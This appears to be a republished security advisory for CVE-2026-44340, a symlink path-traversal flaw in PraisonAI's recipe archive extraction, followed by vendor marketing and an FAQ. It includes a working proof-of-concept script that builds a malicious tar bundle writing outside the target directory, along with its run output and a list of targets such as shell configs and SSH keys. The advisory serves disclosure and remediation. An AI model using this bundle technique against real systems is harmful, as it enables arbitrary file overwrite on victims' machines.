Summary
The _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape, but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name
inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem.
Affected paths
Every code path that calls _safe_extractall is exposed:
| Caller | File:line |
|---|---|
praisonai recipe unpack |
src/praisonai/praisonai/cli/features/recipe.py:1175 (introduced as the fix for GHSA-99g3-w8gr-x37c) |
LocalRegistry.unpack (recipe pull) |
src/praisonai/praisonai/recipe/registry.py:413 |
| Registry archive validation (publish) | src/praisonai/praisonai/recipe/registry.py:808 |
Root cause
recipe/registry.py:131-178:
def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
...
for member in tar.getmembers():
...
member_path = Path(member.name)
if member_path.is_absolute(): raise RegistryError(...)
if '..' in member_path.parts: raise RegistryError(...)
resolved = (dest_resolved / member_path).resolve()
if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
raise RegistryError(...)
# All members validated, safe to extract
tar.extractall(dest_dir)
Three gaps:
- The loop checks only
member.name.member.linkname(the symlink / hardlink target) is not inspected. member.issym()andmember.islnk()are not used to refuse link members at all.tar.extractall(dest_dir)runs withoutfilter="data". On Python ≤ 3.13 the default isfully_trusted(with a DeprecationWarning on 3.12+), which permits symlinks pointing outsidedest_dir.
When the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker's chosen location.
Reproduction
Tested in a disposable container against praisonai==4.6.35 (pip install praisonai, no other modifications).
make_bundle.py:
import io, json, tarfile
manifest = json.dumps({"name": "legit", "version": "1.0.0"}).encode()
with tarfile.open("malicious.praison", "w:gz") as tar:
info = tarfile.TarInfo("manifest.json"); info.size = len(manifest)
tar.addfile(info, io.BytesIO(manifest))
sym = tarfile.TarInfo("legit/escape")
sym.type = tarfile.SYMTYPE
sym.linkname = "/tmp/PWNED"
tar.addfile(sym)
payload = b"PWNED via symlink-extraction bypass of _safe_extractall\n"
pf = tarfile.TarInfo("legit/escape/owned.txt"); pf.size = len(payload)
tar.addfile(pf, io.BytesIO(payload))
direct_test.py:
import shutil, tarfile
from pathlib import Path
from praisonai.recipe.registry import _safe_extractall
DEST = Path("/work/recipes_direct")
shutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)
Path("/tmp/PWNED").mkdir(parents=True, exist_ok=True)
with tarfile.open("malicious.praison", "r:gz") as tar:
_safe_extractall(tar, DEST)
assert Path("/tmp/PWNED/owned.txt").exists(), "did not escape"
print("PWNED:", Path("/tmp/PWNED/owned.txt").read_text())
Run:
docker run --rm -v "$PWD:/work" -w /work python:3.11-slim sh -c '
pip install -q praisonai &&
python make_bundle.py &&
python direct_test.py
'
Observed output:
_safe_extractall returned cleanly
PWNED: PWNED via symlink-extraction bypass of _safe_extractall
/tmp/PWNED/owned.txt exists after the call returns, written outside the destination directory the helper was asked to extract into.
Suggested remediation
Single-line fix at recipe/registry.py:178:
tar.extractall(dest_dir, filter="data")
filter="data" (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses
symlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class.
If you also support older Python, add an explicit guard inside the existing per-member loop before tar.extractall:
if member.issym() or member.islnk():
link_target = (dest_resolved / member_path.parent / member.linkname).resolve()
if member.linkname.startswith("/") or not str(link_target).startswith(str(dest_resolved) + os.sep):
raise RegistryError(
f"Refusing to extract link with target outside dest dir: "
f"{member.name} -> {member.linkname}"
)
Affected versions
praisonai >= 2.7.2 through current 4.6.35 (the helper exists at least back to the earliest path-traversal patch chain referenced in
GHSA-99g3-w8gr-x37c). All releases that route extraction through _safe_extractall are exposed.
Disclosure
Reported privately via the project's GHSA workflow at
https://github.com/MervinPraison/PraisonAI/security/advisories/new
-- Dhiral Vyas
Impact
Arbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious .praison bundle through any of the three callers above.
Realistic exploitation paths:
- A user runs
praisonai recipe unpack ./<malicious>.praisonafter obtaining the bundle from a shared registry, a tutorial link, or
direct messaging. - A user runs
praisonai recipe pull <name>against a malicious or compromised registry. - A registry server processes an uploaded
.praisonbundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).
Where the agent process runs as a regular user, the attacker can overwrite shell config (.bashrc, .zshrc, .profile), SSH authorized_keys, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some sudo-launched workflows), the attacker controls arbitrary system files.
This re-opens the recipe pull, recipe publish, and recipe unpack paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-44340 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.6.37); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44340? CVE-2026-44340 is a high-severity path traversal vulnerability in PraisonAI (pip), affecting versions <= 4.6.36. It is fixed in 4.6.37. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-44340? CVE-2026-44340 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of PraisonAI are affected by CVE-2026-44340? PraisonAI (pip) versions <= 4.6.36 is affected.
- Is there a fix for CVE-2026-44340? Yes. CVE-2026-44340 is fixed in 4.6.37. Upgrade to this version or later.
- Is CVE-2026-44340 exploitable, and should I be worried? Whether CVE-2026-44340 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44340 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44340? Upgrade
PraisonAIto 4.6.37 or later.